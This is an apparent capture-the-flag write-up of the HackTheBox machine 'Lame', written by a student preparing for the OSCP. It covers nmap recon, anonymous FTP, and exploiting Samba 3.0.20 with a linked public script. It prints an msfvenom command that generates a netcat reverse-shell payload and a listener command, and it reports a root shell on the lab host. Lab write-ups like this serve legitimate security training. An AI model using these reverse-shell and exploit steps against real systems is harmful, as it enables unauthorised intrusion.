Lame HTB Writeup
Hi everyone, this is my writeup for the box “Lame” on HackTheBox.
I am a student preparing for my OSCP exam, so I decided to work through the famous TJNull list of boxes. Here is the first writeup from it.
Overview: Anonymous FTP login, Samba 3.0.20 exploit to get a reverse shell
IP address of the machine: 10.10.10.3
Part 1 : Recon
1. Start off with an Nmap scan to get information about the open ports.
nmap -sC -sV -Pn 10.10.10.3
We get the following results from the nmap scan.
We have 4 ports open:
Port 21: FTP, vsftpd 2.3.4
Port 22: OpenSSH 4.7p1
Ports 139 and 445: Samba 3.0.20
Part 2 : Enumeration
The Nmap scan showed that anonymous login to FTP is allowed, so let’s try connecting via FTP.
But there were no files we could access over FTP.
Moving on, let’s Google “Samba 3.0.20 exploit” and, bingo, there are several exploits for this old release.
But be careful about relying on Metasploit modules, as we can’t use them in the OSCP.
So I found an exploit that we could use:
https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py
We can use it, but we have to add our own reverse shell payload.
We can use msfvenom to generate the reverse shell payload:
msfvenom -p cmd/unix/reverse_netcat LHOST=<YOUR IP> LPORT=<PORT NO> -f python
Start a Netcat listener in another tab to catch the reverse shell:
nc -nvlp <PORT NO>
Now run the exploit after replacing the reverse shell payload. I encountered some problems while running the exploit.
Error 1:
Error 2:
So I googled them and found solutions. If you face the same errors, you can refer to the links mentioned below:
https://stackoverflow.com/questions/606191/convert-bytes-to-a-string
After making the above changes, the final exploit looks like this:
Part 3 : Getting Flags
Fire the exploit, and this time you will get a reverse shell in the Netcat listener you started in the other tab.
We get the reverse shell as root.
Getting the user and root flags is now a piece of cake.
And the machine is pwned.
Things I learned from this box:
→ Some knowledge of Python is a must in order to understand the exploit and make it work.
So this was the first of many more upcoming writeups from the list. Stay tuned, and thanks for reading the writeup. I hope you liked it.
Any feedback or suggestions are appreciated.
You can reach out to me on:
Twitter : https://twitter.com/Viren2737
LinkedIn : https://www.linkedin.com/in/viren-saroha-3391371a3/